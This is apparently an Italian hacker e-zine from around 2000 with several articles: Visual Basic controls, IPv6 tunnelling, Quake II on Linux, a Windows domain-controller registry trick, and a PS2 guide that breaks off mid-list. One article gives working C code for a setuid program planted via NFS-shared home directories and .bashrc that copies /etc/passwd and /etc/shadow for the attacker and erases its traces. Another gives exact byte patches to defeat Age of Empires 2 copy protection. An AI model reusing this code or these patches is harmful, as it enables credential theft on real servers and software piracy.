]------> INPUTBOX
SINTASSI:
InputBox(< prompt >,< title >,< default >)
< prompt >: messaggio che si desidera
visualizzare
< title >: Titolo della finestra
< default >: valore predefinito di inserimento
di solito si usa cosi:

< nome variabile stringa > = InputBox(< prompt >,< title >,< default >)

cosi' cio' che e' inserito nella inputbox verra' copiato in
< nome variabile stringa >

]--- I FORM ---[

DA FARE!!!!!!!!!!!!!!!!!!!

]--- GLI OGGETTI ---[

In questa sezione trattero' gli oggetti base spiegando come funzionano
e danodovi delle direttive su come usarli a grandi linee!
ci sono pero' alcune cose che dovete sapere per quando riguarda gli eventi
e ora ve le esporro'!
]------> GLI EVENTI
Ecco gli eventi principali (gli altri guardateveli sulla
guida in linea MSDN probabilmente l'unica cosa decente
in casa M$), AVENDOVI DETTO QUI QUALI SONO QUELLI PRINCIPALI
NON LI RIDIRO' PIU' PER TUTTI GLI OGGETTI !

Private Sub NOME_CONTROLLO_Click()
questo evento si verifica
al click del mouse

Private Sub NOME_CONTROLLO_DblClick()
questo evento si verifica
al doppio click del mouse

Private Sub NOME_CONTROLLO_KeyDown(KeyCode As Integer, Shift As Integer)
questo evento si verifica quando un tasto viene
battuto ed e' premuto
KeyCode corrisponde al valore ascii del tasto
Shift e' una var che indica se il tasto
shift e' premuto


Private Sub NOME_CONTROLLO_KeyPress(KeyAscii As Integer)
questo evento si verifica quando un tasto viene
battuto
KeyAscii e' ugale a KeyCode di sopra

Private Sub NOME_CONTROLLO_KeyUp(KeyCode As Integer, Shift As Integer)
questo evento si verifica quando un tasto viene rilasciato
dopo essere stato premuto
KeyCode corrisponde al valore ascii del tasto
Shift e' una var che indica se il tasto
shift e' premuto

Private Sub NOME_CONTROLLO_MouseDown(Button As Integer, Shift As Integer,
X As Single, Y As Single) questo evento si verifica quando ci clickate sopra
col mouse Button var che indica il bottone del mouse usato
Shift Vedi sopra
X indica la posizione X
Y indica la posizione Y

Private Sub NOME_CONTROLLO_MouseMove(Button As Integer, Shift As Integer,
X As Single, Y As Single)
si verifica al movimento del mouse sopra questo oggetto
Button var che indica il bottone del mouse usato
Shift Vedi sopra
X indica la posizione X
Y indica la posizione Y

Private Sub NOME_CONTROLLO_MouseUp(Button As Integer, Shift As Integer,
X As Single, Y As Single)
questo evento si verifica quando ci clickate e rilasciate con il mouse
Button var che indica il bottone del mouse usato
Shift Vedi sopra
X indica la posizione X
Y indica la posizione Y

Questa che segue e' una spiegazione generica su come si usano gli oggetti
Procedero in ordine come inseriti nella casella oggetti.

]------> PICTUREBOX
Come avrete capito dal nome questo controllo serve pervisualizare le immagini!
procediamo con oridine :

]------> PROPRIETA'
BORDERSTYLE indica che tipo di bordo si desidera usare 3d o 2d
ENABLED restituisce se il controllo e' abilitato o meno
MOUSEICON Indica l'icona del mouse da usare quando il mouse passa
su questo controllo
MOUSEPOINTER indica il puntatore del mouse da usare su questo controlo
se e' impostato su custom esso restituisce l'icona inserita in
MOUSEICON
PICTURE proprieta' che indica la posizione dell'immagine da visualizare.
N.B. per caricare un'immagide da codice di programma bisogna
usare la funzione LOADPICTURE(Percorso_immagine)
in questo modo
<NOME CONTROLLO>.picture=LOADPICTURE(Percorso_immagine)
]------> METODI
I metodi che a noi possono interessare per ora sono due
.CLS pulisce la picture box
.REFRESH che aggiorna il contenuto della picturebox

]------> LABEL
La label e' un controllo che viene usato per visualizzare testo a
video in un contenitore per testo. ;P


]------> TEXTBOX
si usa per inserire testo in una casella (apposita)

]------> PROPRIETA'
ALIGNMENT indica da che parte bisogna cominciare a scrivere
BORDERSTYLE indica che tipo di bordo si desidera usare 3d o 2d
AUTOSIZE si usa per ridimensionare il controllo asseconda del
testo inserito
PASSWORDCHAR e' un campo che indica con che carattere il testo viene
occultato es. se passwordchr e' = a "*"
e il text e' = a "valk"
si vedra' a video "****"
TEXT indica il testo inserito nella label
ENABLED restituisce se il controllo e' abilitato o meno
VISIBLE indica se il controllo e' visibile del form

]------> METODI
NON CI SONO METODI CHE SERVONO AI NOSTRI SCOPI
PER ORA NON E' NECESSARIO APPROFONDIRE.

[ ValK ]




.--------------------------------------------------------------[ Linux ]-----.
| PROTOCOLLO IPV6 <COME LO CARICAI> |
*------------------------------------------[ ValK ]--[valkzone@infinito.it]--*

ok cominciamo,la prima cosa che mi
appresto a dirvi e' che io della
struttura dell'ip address e del networ-
king non so' una mazza.
so' solo che l'ipv6 ha l'ip in esadecimale
ed e' una ficata! (ihihihihih)
Teoricamente l'ipv6 e' nato per porre rimedio
a degli errori di progettazione dell'ipv4 che
tanto amiamo...

dobbiamo avere un kernel uguale o
superiore a 2.2.14 (mejo 2.2.16)

dobbiamo avere installato il net-tolls 1.54
dobbiamo avere installato il net kit 0.4.1
dobbiamo avere installato le modutils 2.1.121 o
superiore
dobbiamo avere installato le glibc2

assicuriamoci che inetd runni!

-----<( 1 )>-----
N.B. se avete il 2.2.16 saltate sto pezzo
Settimo il kernel (copiato spudoratamente
dell' IPV6-howto)

In "Networking options"
settate
Packet socket SI
Unix domain sockets SI
TCP/IP networking SI
The IPv6 protocol a SI
IPv6: enable EUI-64 token format a SI
IPv6: disable provider based address a SI
poi compilare e fate raffreddare fino
a temperatura ambiente

-----<( 2 )>-----
ora vi dovete procurare un tunnel x ipv6
alcuni deii siti dove registrarsi sono:
www.ipv6.ircd.it (ottimo)
www.freenet6.net (quando funge buono)
www.6bone.net (boh)

il risultato della registrazione sara' una cosa
tipo:

The IPv4 Endpoint to set on your tunnel side is: 194.247.166.147
The IPv6 Local Link to set on your tunnel side is: fe80::2e0:34ff:fe57:d000
Your IPv6 address is: 3ffe:1001:200:b::4b/127

-----<( 3 )>-----
ora dovete aprire il tunnel, bene
prendete piccozza e vanga e cominciate
ihihih

1) hunguppare il device sit0

#ifconfig sit0 up

2) addare l'ip ipv6 vostro al ppp0,
nel nostro caso: 3ffe:1001:200:b::4b/127

#ifconfig ppp0 add 3ffe:1001:200:b::4b/127

3) settare l'endpoint del tunnel
nel nostro caso: 194.247.166.147

#ifconfig sit0 tunnel ::194.247.166.147

4) hunguppare il device sit1

#ifconfig sit1 up

5) aggiungere un indirizzo di route al device
sit1
nel nostro caso: fe80::2e0:34ff:fe57:d000

#route -A inet6 add 2000::/3 gw fe80::2e0:34ff:fe57:d000 dev sit1


-----<( 4 )>-----
ok ora la cosa da fare e' installaresi un web
browser che supporti l'ipv6(mozilla) un clientIRC
che supporti l'ipv6(bitchx,irssi) e connettersi
ai server ipv6 it.irc6.net (x l'italia) e
eu.irc6.net(europeo)
good look!

PICCOLA NOTA PER IL TEST DELL'IPV6
[root@localhost /root]# netstat -A inet6 -anp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
raw 0 0 :::58 :::* 7 -
raw 0 0 :::58 :::* 7 -
raw 0 0 :::58 :::* 7 -

se fate "netstat -A inet6 -anp" e il risultato e' una finestra simile
a questa sopra il tutto dovrebbe funzionare


alla prox ValK

http://valkzone.tsx.org
valkzone@infinito.it


[ ValK ]

.------------------------------------------------------[ Hacking/Linux ]-----.
| UN ALTRO MODO PER SFRUTTARE L'NFSD |
*---------------------------------------------[ Amleto ]--[amleto@post.com]--*

DISCLAIMER LEGALE: tutte le informazioni che potrete ricavare da questo
articolo sono da considerarsi a scopo puramente informativo, non mi assumo
nessuna responsabilita' per quello che voi farete... blablabla... etc... etc.

Quante volte vi e' capitato di avere un server con /home condivisa ad
everyone ma senza l'rlogin attivato? Ecco qua un'idea semplice semplice su
come poter comunque eseguire dei comandi sul server... mettete un file
eseguibile con il suid settato nella directory home di un utente e modificate
.bashrc in modo che il vostro file venga eseguito ad ogni login dell'utente.
Così facendo appena l'utente fara' il login sul server il vostro programma
verra' eseguito con i permessi di root :-))

ESEMPIO PRATICO:

Un file da piazzare sul server potrebbe essere:

--exec.c---- INIZIO ----------------------------
// Cancellate la prossima riga se non volte che il programma si autocancelli
#define AUTORM
// Qui dovete mettere il nome del file in cui avete fatto il backup di
// .bashrc
#define BACKUP ".kde/.kder"

int main(int argc, char *argv[])
{
#ifdef AUTORM
char cmd[30]="rm -f ";
#endif

setuid(0);
setgid(0);

/* Queste sono le righe che potete modificare x eseguire i vorsti comandi */
/* I N I Z I O */

system("cat < /etc/passwd > /home/utente/.kde/.kdep");
system("echo --------------- >> /home/utente/.kde/.kdep");
system("cat < /etc/shadow >> /home/utente/.kde/.kdep");

/* F I N E */

#ifdef AUTORM
strcat(cmd, argv[0]);
system(cmd);
strcpy(cmd, "mv -f ");
strcat(cmd, BACKUP);
strcat(cmd, " .bashrc");
system(cmd);
#endif

return 0;
}
----------- FINE --------------------------------

Quindi (supponiamo di voler chiamare il programma .kdee e di piazzarlo nella
directory .kde) dopo averlo compilato fate: chmod a+sx .kde/.kdee
Poi fate una copia di .bashrc ad es. su .kde/.kder e aggiungete a .bashrc
dell'utente le righe:

.kde/.kdee # esegue i vostri comandi

così facendo il vostro file verra' eseguito solo una volta dopo di che verra'
cancellato e .bashrc tornera' ad essere quello originale (così cancelliamo
delle tracce che desterebbero qualche sospetto). Se non desiderate che il
programma si autocancelli dovete rimuovere la riga 1 da exec.c (#define
AUTORM).

Non vi rimane che aspettare qualche giorno :) o qualche settimana :( in
modo che l'utente da voi bersagliato faccia un login.
Vi bastera' rimontare la directory /home condivisa e prendervi il file delle
password e quello shadow (che nell'esempio risiederanno entrambi in
~utente/.kde/.kdep).

Ovviamente i comandi da eseguire possono essere quelli che preferite a seconda
delle esigenze e della vostra fantasia.

P.S.: Mentre fate questo (soprattutto quando settate il suid) dovete essere
root

[ Amleto ]



.---------------------------------------------------------[ Linux/gAmeS]-----.
| COME INSTALLARE QUAKE II SOTTO LINUX (e risolvere il prob di x11) |
*--------------------------------------[ Wrong-maN ]--[wrong.man@2die4.com]--*

Ciao a tutti, mettiamo in chiaro 2 cose... 1, sono solo un newbie che
cerca di rendersi utile agli altri come me, 2 questo testo non parla
di hacking... ma è una miniguida su come installare e far funzionare
(sotto x11 che normalmente da problemi) Quake2 e la 3dfx sotto Linux.
Io personalmente ho la Red Hat 6.2 ma va la procedura va bene per
tutti le distro (basta scaricare i giusti files).
Ultima cosa... un grazie a SteelEclypse, che mi ha aiutato quando ero
alle prime armi con il linux (non e' che ora sia molto piu in avanti
cmq :))
Okay basta cominciamo...
per installare Q2 avete bisogno di un kernel 2.0.24 o successivo e la
libc 5.2.18 o successiva.
Innanzitutto dovete avere q2 (ma che scoperta!) e dovete scaricare la
sua versione 3.20 che trovate tranquillamente sull'ftp della id
(ftp.idsoftware.com).
Okay parto dal presupposto che vi siate procurati tutto cio', andiamo
avanti...
Createvi una dir per metterci il gioco... ed entrateci

mkdir /usr/local/games/quake2
cd /usr/local/games/quake2

montate il cd (spero lo sappiate fare!!!->
'mount -t iso9660 /dev/cdrom /mnt/cdrom').
ora dovete prendere una decisione:
se siete dei simpaticoni con una barca di spazion sull'hd (maledetti
io solo 3G!!! ;)) e quindi vi volete fare un full install di 450 MB
scrivete quanto segue:

cp -r /mnt/cdrom/Install/Data/*

naturalmente dovete essere su /usr/local/games/quake2/ quando lanciate
il comando.
Ora potete cancellare i files che non servono a un pene sotto linux:

rm -f /usr/local/games/quake2/*.dll
rm -f /usr/local/games/quake2/quake2.exe
rm -f /usr/local/games/quake2/baseq2/gamex386.dll

Se invece avete deciso di fare un install medio... che occupera' molto
meno... (intorno
ai 200MB credo..) basta togliere i filmati (ma non del tutto ;))

cd /usr/local/games/quake2/
mkdir baseq2
cp /mnt/cdrom/Install/Data/baseq2/pak0.pak baseq2
cp -r /mnt/cdrom/Install/Data/baseq2/players baseq2

e abbiamo copiato tutto... ora "mettiamo" i filmati:

ln -s /mnt/cdrom/Install/Data/baseq2/video baseq2/video

ecco qua... cosi i filmati rimangono su cd... e sull'hd ci sono
soltanto dei link... cosi se volete giocare con, montate il cd e ve
li vedete, se volete giocare senza, non lo montate.
Ora... se non ce li avete già installati di default dovete scaricarvi
uno dei seguenti file (a seconda della distro e della versione):

il package tar.gz per la libc5
il package tar.gz per la glibc
il package rpm per la libc5
il package rpm per la glibc

Ora non resta che installare la versione 3.20 del gioco:

rpm -Uvh quake2-xxxxx.i386.rpm

Se l'rpm vi dice che non trova "libglide2x.so" e voi non volete far
girare Q2 in modalità GL, (io per es con una Voodoo2 non ne ho
bisogno), installate l'rpm cosi:

rpm -Uvh quake2-xxxxx.i386.rpm --nodeps

o il tar.gz con

tar zxvf quake2....tar.gz

Okay... siamo arrivati al problema... alcuni di voi ora potranno
giocare a Q2 tranquillamente.. altri, potranno giocarci
tranquillamente a patto che non escano mai dal gioco ;).. io per
es avevo questo errore: facendo partire q2 da linux tutto
funzionava, mentre facendolo partire da X11 potevo giocarci ma
al momento di uscire mi si bloccava sulla scritta "recursive
shutdown". Per risolvere questo problema dovete avere degli
script che saranno aggiunti a questa miniguida... installate
il package open-1_4_tar.gz dove vi pare:

mkdir /usr/local/open/
cd /usr/local/open/
tar zxvf open-1_4_tar.gz

copiate gli eseguibili in /usr/local/bin/

cp getvc /usr/local/bin/
cp ...

(non mi ricordo tutti i nomi degli eseguibili cmq sono circa 2 o 3)
una volta fatto questo andate in /etc e aprite il file "profile"

pico /etc/profile

e alla riga PATH="$PATH: ...." aggiungete ":/usr/local/bin"
per esempio PATH="$PATH:varie_directory:/usr/local/bin"
Okay, ci siamo... lanciate lo script quake2 (anke kuesto allegato)
e dovrebbe essere tutto apposto... spero di esservi stato utile.
Azzo sono gia' le 14:20, devo scappare... mi aspettano per andare
al mare ;)
See ya

[ Wrong-maN ]


.-----------------------------------------------------------[ CraCkInG ]-----.
| CRACKARE AGE OF EMPIRES2 (4 NEWBIES) |
*--------------------------------------[ Anarkya ]--[anarkya_1999@yahoo.it]--*


(Io sono nessuno.)

Salve a tutti, amanti del pinguino e non...

questo è il mio primo tutorial, xciò non venirmi a rompere le balle se non
funzia, xchè in questo caso le soluzioni sono 4:

1) non sapete accendere il PC
2) Non lo avete letto bene
3) Siete dei Lamer
4) SIETE DEGLI IMBECILLI TOTALI !!!!!!


INTRO....
-- age of empires 2 è u gioco di strategia in real time veramente bello a mio
punto di vista, prodotto da Microzozz x win ( SOLO x win purtroppo ).
Il gioco una volta installato gira lento e spesso va in crash su computer con
proc. INTEL 440 und 64 MB di Ram (porcaput*****......)

Rotto dai continui messaggi d'errore e dall'estenuante lentezza del gioco
mettiamo mano ai nostri adorati toolz e diamoci da fare... ( x fare cosa? )
--


DiskLamer.......(pardon)..DISCLAIMER
Qualunque cosa io abbia scritto dopo queste linee è assolutamente e
totalmente a scopo informativo. Scritto col puro scopo di far CONOSCERE al
lettore ( è questo che vi rode ehe stronzi?...). L'autore (io) non si assume
nessuna responsabilità per l'uso che verrà fatto delle informazioni e delle
pratiche descritte in questo tutorial.

---!!!!Il possesso di questo file è comunque del tutto lecito!!!!---

blablablblablablablablablablalblablablablablablablablablablablablablabla





TOOLS....
SoftIce (qualsiasi versione) --MUST HAVE--
Frogs Ice --UTILE --
W32Dasm --UTILE --
Hacker's View --MUST HAVE--


Un minimo di conoscenza dell'assembler e delle funzioni API


C.U.Dilla -ovvero- decriptatore di protezioni C.Dilla
---> www.crackstore.com #INDISPENSABILE#


Pringles --MUST HAVE--
Iron Maiden Brave New World //



Tema: Come Craccare Age Of Empires 2

Svolgimento:
Installate il gioco e provate a farlo partire senza CD...

# Scaricare il Debugger e riprovare # ok 1° protezione anti SICE; avviare
frogsice e dal suo menu runnare il prog, il frogsice si bloccherà + volte
ma voi dopo la quarta volta che premete "S" potete uscire dal prog premendo
"Esc". Good, appare una schermata che dice:

# Avvio Empires2 in corso #

poi quasi subito una message box che recita:

# inserire il cd di AOE2 e riprovare #

buono. abbiamo trovato la prima richiesta di cd torniamo al win e settiamo un
bel bpx messageboxA e bpx getdryvetypeA, usciamo da SOftIce (F5) e facciamo
ripartire il prog col frogsice, (facendo clik col tasto destro sull'icona del
progammillo nella task-bar sulla barra delle applicazioni in basso a sinistra,
e scegliendo la voce "run, cercate con "sfoglia" empires2.exe e clikkate su
"OK")

< alunno > ma xchè l'anti sice non ri-appare?
< prof. AnarKya > perchè il programmillo bypassa le protezioni di AOE2
< alunno > WOW professore lei è un grande....
< prof. AnarKya > lo so... lo so...

Quando riappare il SICE scriviamo bc * per disabilitare tutti i breakpoint
(...) e diamo una buona occhiata al codice: uhmmm brutz question... diamo
un'occhiata ai prog in esecution col comando TASK: cerchiamo Empires2.....

< alunno > hey, ma che ca**o sono quei Clockspl e C.Dilla
< prof. AnarKya > indovina?

Il nostro caro billz gatez ha rotetto il suo cioccolo con una delle
protezioni + usate ovvero il C.Dilla che crea un file criptato nella
directory del gioco solitamente con estensione *.icd

< alunno > per comuni mortali ?

Il file Empires2 nella directory del gioco è FASULLO, uno specchietto per
allodole (o per lamer), visto che il codice del programma si trova in
Empires2.icd

< alunno > e adesso come ca**o faccio ?
< prof. AnarKya > segui le impronte del maestro e taci aspettando che la
soluzione venga da te...
< alunno > WOW professore com'è colto.... (da 'na pianta)
< prof. AnarKya > lo so... lo so...

aprite il nostro bravo C.U.Dilla, ( l'avete scaricato vero? )

-----> www.crackstore.com/tools [ or something similar ;-) ]

oppure... forse è meglio, ne allego una copia a 'sto file (tanto è piccolo)

--- aperta parentesi sul C.U.Dilla ---

Il C.U.Dilla è un simpatico programmino che riconosce la vera parte del
codice nel file criptato e la rende eseguibile come un normale .exe, con
l'unica differenza di disabilitare automaticamente la richiesta del cd
originale e di tutte le protezioni "primarie" del prog, tranne quella della
memoria... x quella chiedete a Quequero ( gran maestro zen guru di cracking
italiano... grazie di esistere U.I.C. ) Il prog.infatti crea x il nostro
gioco un file chiamato Unwrap.exe che permette l'esecuzione del vero Empires2
anche se nel task manager troverete sempre scritto Unwrap.exe....

--- chiusa parentesi sul C.U.Dilla ---

Fatto? ... bene eseguite il file senza il Cd dentro e tadhaaaaaa !!!!!!


< alunno > EVVAIIIIII cracking riuscitoooo sono un grande...
< prof. AnarKya > Vaffanculo mio giovane amico, prova a fare clic su
giocatore singolo x giocare...
< alunno > # inserire il cd di AOE2 e riavviare #
echecazzodiprotezionebastarda!!!!!!!!!
< prof. AnarKya > (hahahahahahahaha) e adesso mio giovane amico, cosa pensi
di fare?
< alunno > prendo a calci il CD o lo uso come freesby
< prof. AnarKya > ottima soluz.... hey aspetta, rimetti il cd nella custodia
e apri Sice...
< alunno > hoh professore, lei è così intelligente
< prof. AnarKya > lo so.... lo so....

Dicevo.... aprite SoftIce e settate ORA il bpx getdrivetypeA... Il sice si
bloccherà e voi premendo F12 potrete entrare nella routine di UnWrap.exe al
punto dove il prog fa la ricerca del CD nel drive. Adesso controllate i
registri per trovare il messaggio d'errore... dovrebbe essere in EDI o in ESI,
controllateli da SICE con i comandi "d ESI" e "d EDI"; trovate la chiamata
che controlla il registro incriminato e truccate il jump successivo,
cambiando il flag in alto a destra da "z" a "Z" o viceversa... (segnatevi su
un foglio tutta la riga del jump) fatto. no, aspetta, + avanti c'è un altro
controllo sui registri, meglio non rischiare... andate al relativo jump
ATTIVO e disabilitatelo col solito metodo dei flag, (segnate su un foglio
tutta la riga del jump di nuovo mi raccomando) steppate ancora un pò più
avanti fino alla prossima call, non eseguitela e uscite dal Sice premendo F5
............. WOW ...

E adesso potete fare una campagna o avere accesso a tutte le funzionalità del
gioco, l'unico buggo è che dovete rifare la stessa operazione ogni volta che
aprite il gioco... per evitare questo andiamo sul W32Dasm e cerchiamo le due
stringhe dei jump che avevamo preso in esame clikkiamo su una di queste e
nella barra di stato in basso del w32dasm troveremo scritto l'offset di
quella stringa (quello che finisce per "h"), nel nostro caso:


0041F18D jz 0041F19C offset= 0001F18Dh (primo)

004F00DE jz 004F0172 offset= 000F00DEh (secondo)


ora che li conosciamo possiamo aprire l'Hview, aprire il file Unwrap.exe e
con il comando GOTO (F7), inserire il primo offset che avevamo trovato...
bene siete al jump condizionato... decondizionatelo inserendo al suo posto un
jump normale (jmp) o l'opposto di quello selezionato ( jne <---> je ),
premete F3 ed editate il codice esadecimale con i codici dei jump che vi
occorrono...
così 0041F18D:740D JE 0041F19C deve diventare
0041F18D:750D JNE 0041F19C

Fate la stessa operzione anche con l'altro offset e con l'altro jump in modo
che vi venga cosi:

004F00DE:0F848E000000 JE 004F0172 deve diventare
004F00DE:0F858E000000 JNE 0041F072

Bene adesso salvate, e senza CD potete giocare ad AGE OF EMPIRES 2 !!!!

< alunno > e se ho un cd masterizzato del gioco?
< prof. AnarKya > cazzacci tuoi, mio giovane amico, e poi a cosa ti
serve... se puoi giocarci senza? abbiamo fatto tanto (poco)
per sproteggere quel gioco e adesso... Questi giovinastri
non impareranno mai...

Scherzi a parte, raga non siate stupidi, l'installazione la potete fare dal CD
masterizzato, poi crackatevi il file, ve lo mettete su un dischetto e lo
infilate nella directory del gioco e poi... buon divertimento...


Conclusione:
Non è stato poi tanto difficile crackare il gioco, certo se non fosse stato
per il grande, mitico, insuperabile, fantastico, irragiungibile, superlativo,
bestiale, inarrivabile, magico professore non avrei saputo veramente dove
sbattere la testa. Fine

Commenti del Professore:
Veramente bello questo tema, 1 dei mgliori soprattutto la conlusione, direi
che si merita un 8 pieno
AnarKya

scherzi a parte ragazzi, spero che il tute sia stato chiro, se proprio non ci
riuscite contattatemi alla e-mail: anarkya_1999@yahoo.it

spero di potervi aiutare ( potete contarci ;-) )

P.S: msg x Oldiron61 und company...
il tute non è xfetto... xciò al fine di migliorarlo si aspettano
consigli, suggerimenti, blasfemie e quant'altro pare a VOI... tanto sarà
comunque ORO CO(L)LATO.

Spero di poter pubblicare ancora qualcosa, magari il metodo manuale x fottere
la C.U.Dilla o qualche altro cazziarello...

TNX to: Quequero (my cracking teacher anche se lui non lo sa...;-); Alor;
Tin_Man (per i loro tute und crackme); Nobody88(x NewBies);
Oldiron61; il mio amico al***s*o (DarKfLightER) e il suo piccì... non
ho dimenticato nessuno fidatevi... chi non ho nominato non merita di
finire qua dentro.

FUCK to: - Un gigantesco ed enorme VAFFANCULO a tutti i lameracci che
infettano la rete
- Alla scuola ( come al solito )
- Alla mia ex ( certi errrori si pagano! )
- A questo bastardo di uno stato infame
- Alla telecazz


Ciao... Alla Prossima
Kao5 Crew

[ AnarKya ]

.--------------------------------------------------------[ tRicKs/rEtI ]-----.
| CAMBIAMI IL SERVER SENZA FARMI MALE |
*-------------------------------[ Maggiorana ]--[maggiornana@tiscalinet.it]--*


Salve a tutti da io cioe Maggiorana.
Questa volta voglio affrontare una cazzo veramente pieno di spine.

Mettiamo che siete su una LAN e che tutto di un tratto per un motivo xy dovete
per forza di cose invertire o CMQ cambiare la configurazione dei vostri PDC o
BDC.

Non sapete che cosa e un PDC ed un BDC...Andiamo bene!!!!! allora un PDC
(primary domain Control) e il server che praticamente viene deputato a gestire
il dominio di rete mantre il BDC (Backup Domain Control) e il server di backup
del PDC, poi che possa essere copia più o meno fedele del primo, che si
possano affidare le gestioni di alcuni servizi all'uno o all'altro mirrorarli
etc..e un altro discorso che non affronteremo quì.

Mettiamo che il vostro PDC debba diventare un BDC (Voi direte ma perche cazzo
devo farlo?)

I motivi possono essere tanti: per esempio il vostro bdc deve essere tolto
dalla lan perche e alla frutta e volete mettere il vostro nuovo fiammante
server come pdc per garantire una maggiore velocita

Quindi togliendo il bdc riamanete con il vostro PDC ma voi volete installarne
uno nuovo di PDC e a meno che non riusciate a far convivere sullo stesso
dominio due PDC. (Spiegatemi COME si fà io non lo so) dovreste fare un mega
backup di dati.
Formattare il vostro pdc e reinstallarlo come BDC poi fare il restore dei
dati. Due giorni di Lavoro insomma.

Ed allora maggiorana che ci sta a fare ecco una procedura che funziona alla
grande.
Voi vi aprite il regedt32.exe andate alla chiave
HKEY_LOCAL_MACHINE\Security

Dal menu Security clikkate su permission e date full control all'Administrator
anche nelle sottochiavi.
Fatto? ok andiamo avanti.

Ora andiamo nella chiave
HKEY_LOCAL_MACHINE\Security\Policy\PolSrvRo

clikkate due volte sulla chiave <no name> e cambiate il valore da
03000000 A 02000000

...come avrete capito
3= PDC
2=BDC

Ovviamente è possibile anche la procedura inversa da BDC a PDC.
Questa soluzione risulta molto utile in una rete dove si hanno seri problemi
e non si sono individuate le cause ma CMQ si deve garantire il servizio.

Non solo guadagnerete tempo per ragionare ma non dovrete CMQ riformattare
tutto per fare modifiche sostanziali ai server.
AH! dimenticavo ovviamente dovete fare shutdown and restart altrimenti non
funzia.

[ Maggiorana ]



.---------------------------------------------------------[ tRicKs/PsX ]-----.
| PS2:THE USER BOOK |
*-------------------------------------------[ A-s-A-x ]--[asax2k@yahoo.com]--*


_____________________________________________
| |
| ___________ _______ _________ |
| | | | |
| ___________| | _________| |
| | | | |
| | _______| |_________ |
| |
|_____________________________________________|

___________________________
/ \
=--------] T H E u s e r B O O K [--------=
\___________________________/

by A-s-A-x

e x t r e m e c o l l i s i o n p r o j e c t


+----------+
---| SOMMARIO |--------------------------------------------
+----------+

--------ENTRO

1- INFO TECNICHE PS2
2- PROTEZIONE REGIONALE DVD
3- SWAP TRICK
4- SWAP TIME TRICK
5- COSTRUIRE UN "CHECK DETECTOR"
6- SCHEMA CONNETTORE AV
7- LA "MODIFICA"
8- CALIBRAZIONE DEL LASER

--------ESCO

+-------+
---| ENTRO |-----------------------------------------------
+-------+

Bene bene, sembra proprio che mi sia ritornata la voglia
di scrivere... Dopo una lunga assenza dalla scena
internazionale :) ritorno nel mondo dell'undergound
digitale con questa guida riguardante quella che sembra
essere la macchina da gioco piu' desiderata del momento,
la PlayStation 2. Almeno per me lo è, infatti, in qualità
di videogiocatore accanito, non vedo l'ora di poter mettere
le mani sul pad e giocarci... ahhh, spero che natale (e con
lui la versione PAL) arrivi presto!!! :) . Una premessa
fondamentale è che l'intera guida si riferisce alla
versione JAP mod. SCPH 10000; questo è molto importante in
quanto la Sony ha cominciato a rilasciare la nuova versione
SCPH 15000, sulla quale tutti i vari metodi riguardanti la
protezione regionale dei dvd, le modifiche con i chip ecc.
NON FUNZIONANO!
Riguardo alla versione PAL, la data di uscita è stata
nuovamente rinviata di un mese: da ottobre al 24 novembre.
Aggiungo inoltre la solita solfa dicendo che tutte le info
contenute in questa guida sono solamente a scopo educativo,
non favoriscono la pirateria, non sono nocive per la salute
e tutti i vari cazzi in culo. Non rompetemi i coglioni se
provando a fare le cose che vi descriverò più avanti
distruggerete 1.200.000 di PS2 perchè sarà solo la
dimostrazione di quanto siete cazzoni.
In questa guida non ci saranno saluti o ringraziamenti
perchè ultimamente mi stanno tutti sulle palle, amici e
parenti...
Quante più cose fai, più calci nel culo ti tirano...
A buon rendere con tutti...

Se volete insultarmi o picchiarmi verbalmente, chiedermi
qualcosa o regalarmi una PS2 jap siete liberi di scrivere:

asax2k@yahoo.com www.wakita.cjb.net

Se avete l'idea di farmi i complimenti per il lavoro svolto
... fatevela passare. :) Non mi piacciono i complimenti...

Ora si comincia...

+----------------------+
---| 1- INFO TECNICHE PS2 |--------------------------------
+----------------------+

Iniziando ad esaminare il fattore puramente estetico,
notiamo che la PS2 ha la particolarità di poter essere
disposta sia in orizzontale che in verticale; per quest'
ultima posizione, però, è necessario un supporto ap-
positamente realizzato, che scongiurerà ogni rischio di
caduta della vostra preziosissima macchina... Da quanto si
è saputo, sembra che la PS2 abbia dei problemi di sur-
riscaldamento, prorpio come la prima SCPH 1002: perciò
sembra essere molto importante la dissipazione del calore.
Bisognerà quindi lasciare la PS2 in un posto dove l'aria
circola liberamente, senza impedimenti, come può succedere
con i mobiletti piccoli, o quelle cagate di portaconsolle
ecc... E poi abbiamo una PS2, e che cazzo... Mettiamola in
mostra! Dette ste quattro stronzate giusto per attaccare,
possiamo sintetizzare la tecnica della macchina in una
piccola scheda:

+-------------+------------------------------------------+
|-CPU: | 128 Bit "Emotion Engine" |
|CLOCK: | 294.912 Mhz |
|MEMORIA RAM: | 32 Mb |
+-------------+------------------------------------------+
|-GRAFICA: | Graphic Synthesizer |
|CLOCK: | 147.456 Mhz |
|VRAM: | 4 Mb |
+-------------+------------------------------------------+
|-AUDIO: | SPU2 |
|NR. VOCI: | 8 canali |
|MEMORIA RAM: | 2 Mb |
+-------------+------------------------------------------+
|-IOP: | I/O Processor |
|CPU: | Playstation CPU+ |
|CLOCK: | 33.8688 Mhz o 36.864 Mhz (selezionabile) |
|IOP RAM: | 2 MB |
+-------------+------------------------------------------+
|-CD: | CD-ROM e DVD-ROM |
|VELOCITA': | CD-ROM 24x ; DVD-ROM 4x |
+-------------+------------------------------------------+

------------------------------------
-ACCESSORI INCLUSI NELLA CONFEZIONE:
------------------------------------

1 Dual shock 2, 1 memory card da 8 mb, 1 disco demo PS2,
1 disco utility,1 cavo AV, 1 cavo di alimentazione.

------------
-DIMENSIONI:
------------

Larghezza 30 cm, lunghezza 18 cm, spessore 8 cm.

------
-PESO:
------

2,1 chili.

--------------------
-FORMATI SUPPORTATI:
--------------------

Playstation 2 CD e DVD rom, psx CDrom, DVD video, CD audio.

------------
-INTERFACCE:
------------

Porte per controller (x2), porte per memory card (x2),
uscita TV (x1), uscita digitale ottica (x1), porte USB
(x2), porta i-Link IEEE1394 (x1); PCMCIA type III (x1).

----------
-SUPPORTO:
----------

Digitale, AC3, DTS.


/\ Osservando il pannello frontale possiamo dire che è ben
][ disegnato e funzionale. Qui troviamo:
\/________________________________________________________

* Slot (solo 2) per controller e memory card, esattamente
uguali a quelli dela psx;

* Drive CD - DVD, azionato da un pulsante che fa aprire
il carrello come succede nei normali lettori.

* Pulsante RESET, che oltre alla sua normale funzione è
utilizzato per settare in sleep-mode la PS2.

* Pulsante di apertura Drive, ovvio.

* Porte USB (2), il sistema attualmente utilizzato dalla
